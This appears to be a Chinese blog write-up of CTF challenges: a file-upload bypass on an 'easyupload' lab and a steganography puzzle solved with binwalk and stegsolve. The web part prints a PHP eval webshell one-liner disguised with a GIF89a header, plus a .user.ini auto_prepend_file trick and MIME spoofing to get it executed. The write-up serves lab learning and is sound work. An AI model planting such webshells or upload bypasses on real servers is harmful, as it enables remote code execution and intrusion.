当前位置: 首页 > article >正文

第三届黄河流域网安技能挑战赛复现

Web

奶龙牌图片处理器2.0

这题,之前只了解过  .user.ini 文件,并为遇到实操题

但赛前差点就做到下面这题了,不多说,复现之前先看看下面这题

靶场:

攻防世界

没错,又做上文件上传题了,别看easy,如果没接触过的话当做题的时候是抠破头皮也想不到的

easyupload

一样的文件上传界面

然后发现只允许上传图片文件,文件 php标签内容被过滤了

用js标签也行不通,只好用短标签  <?=@eval($_POST['a']);?>

然后加上图片文件头 GIF89a

修改后缀为jpg上传成功但发现改了各种php后缀都行不通,然后去搜了一下发现要用到 .user.ini 文件

先说一下 auto_prepend_file 可以让所有的php文件自动的包含某个文件。

例如,这题就可以先上传一个 .user.ini 文件,再上传 yijuhua.jpg 文件,而 .user.ini 文件中包含特殊的语句,使上传的 yijuhua.jpg 文件上传到环境的所有的php文件目录下,当我们访问 yijuhua.jpg时,会使 yijuhua.jpg 中的一句话木马被解析

新建一个 .user.ini 文件,写入以下内容:

GIF89a
auto_prepend_file=yijuhua.jpg

然后在 yijuhua.jpg 里面写入以下一句话木马:
 

GIF89a
<?=eval($_POST['a']);?>

这样一来和 .user.ini 和 yijuhua.jpg 同一目录下的所有php文件都会包含 yijuhua.jpg 文件。

上传 .user.ini 文件

但别忘了抓包改一下MIME类型(只允许图片的 image/jpeg)

上传成功

再上传yijuhua.jpg文件(直接上传就好)

上传成功后去访问一下图片路径

发现访问无果

查看了一下流量,应该是把它放入 uploads/index.php 目录下了

访问试试

好像访问成功了

执行一下查看php配置信息命令

可以执行

接下来蚁剑连接即可

 打开可以看到我上传的文件确实在 uploads 文件及目录下

 直接根目录下找flag即可

没了,其实和 .htaccess 文件的用法类似

只是 .htaccess 文件的作用是使特定后缀的文件按php文件进行解析

.user.ini 文件是把特定文件放入所有php文件目录下,使访问的时候被解析

接下来就看赛题吧

奶龙牌图片处理器2.0:

好家伙,环境打不开了,那只好先复现其他题目了

ok,web的环境暂时都打不开,只好先复现其它方向,后面可以开了再补吧

Misc

small_challenge

下载附件后解压缩,得到一张 小小挑战.png

 用 010 打开,发现尾部信息隐藏着 flag.zip

那就 binwalk 一下,可以用 kali 但我感觉比较麻烦,就用 随波逐流 了

它直接给我分离出来了

打开之后发现里面又有一个压缩包

 再解压又得到 flag.zip

 再解压时发现需要密码

照样拖进 随波逐流

发现有 flag.txt 文件,尝试过爆破没有爆破出来,看了wp得到提示用 stegsolve

其实随波逐流也有stegsolve工具,但是都用这个着实不得行,尝试一下别的工具

比如就直接用stegsolve

哇哈哈哈,之前居然搞不懂 .jar 文件有什么用,就搭建ThinkPHP框架的时候涉及到,还去问师兄为什么我的解压出来是.jar文件为什么不是.exe文件(emmmm)这次在安装 stegsolve 时终于知道怎么用了

1、 需要下载 stegsolve 压缩包:通过网盘分享的文件:Stegsolve.zip
链接: https://pan.baidu.com/s/1s3rb71e8SX5nMhLhudaZKw?pwd=ydby 提取码: ydby

下载之后解压到一个目录得到 Stegsolve.jar

2、运行Stegsolve.jar

打开cmd,输入 java -jar "解压的Stegsolve.jar路径"  

然后回车

stegsolve 就打开了

这个工具的好处呢就是开源的,它主要提供了多种图像处理算法,可以帮助用户分析提取隐藏在图像中的数据。 

记录一下功能吧,毕竟之前都没用过,只会用 随波逐流

File Format:文件格式;

Data Extract:数据提取;

Frame Browser:帧浏览器;

Image Combiner:拼图 图片拼接

可以获取RGB信息

发现是png

保存为6

用 inliteresearch扫一下

http://www.lryc.cn/news/2387860.html

相关文章:

  • python 生成复杂表格,自动分页等功能
  • 2025年高防IP与游戏盾深度对比:如何选择最佳防护方案?
  • 在 Vue + Vite 项目中,直接使用相对路径或绝对路径引用本地图片资源时,图片无法正确显示。
  • 判断手机屏幕上的横向滑动(左滑和右滑)
  • 用户有一个Django模型没有设置主键,现在需要设置主键。
  • 【文献阅读】EndoChat: Grounded Multimodal Large Language Model for Endoscopic Surgery
  • React JSX语法介绍(JS XML)(一种JS语法扩展,允许在JS代码中编写类似HTML的标记语言)Babel编译
  • 【R语言编程绘图-箱线图】
  • 【elasticsearch 7 或8 的安装及配置SSL 操作指引】
  • GitHub 趋势日报 (2025年05月23日)
  • MongoDB索引:原理、实践与优化指南
  • SQL实战之索引优化(单表、双表、三表、索引失效)
  • [7-1] ADC模数转换器 江协科技学习笔记(14个知识点)
  • SSM整合:Spring+SpringMVC+MyBatis完美融合实战指南
  • Spring Boot分页查询进阶:整合Spring Data REST实现高效数据导航
  • 阿里云 Serverless 助力海牙湾构建弹性、高效、智能的 AI 数字化平台
  • 升级node@22后运行npm install报错 distutils not found
  • 一个开源的多播放源自动采集在线影视网站
  • 【PhysUnits】10 减一操作(sub1.rs)
  • 深度检测与动态透明度控制 - 基于Babylon.js的遮挡检测实现解析
  • Linux下使用socat将TCP服务转为虚拟串口设备
  • docker push 报错 denied: requested access to the resource is denied
  • epub→pdf | which 在线转换??好用!!
  • PBX、IP PBX、FXO 、FXS 、VOIP、SIP 的概念解析以及关系
  • MySQL数据高效集成到金蝶云星空的技术分享
  • git 命令之-git cherry-pick
  • 如何在STM32CubeMX下为STM32工程配置调试打印功能
  • Linux系统 - 基本概念
  • kerberos在无痕浏览器 获取用户信息失败 如何判断是否无痕浏览器
  • 在h5端实现录音发送功能(兼容内嵌微信小程序) recorder-core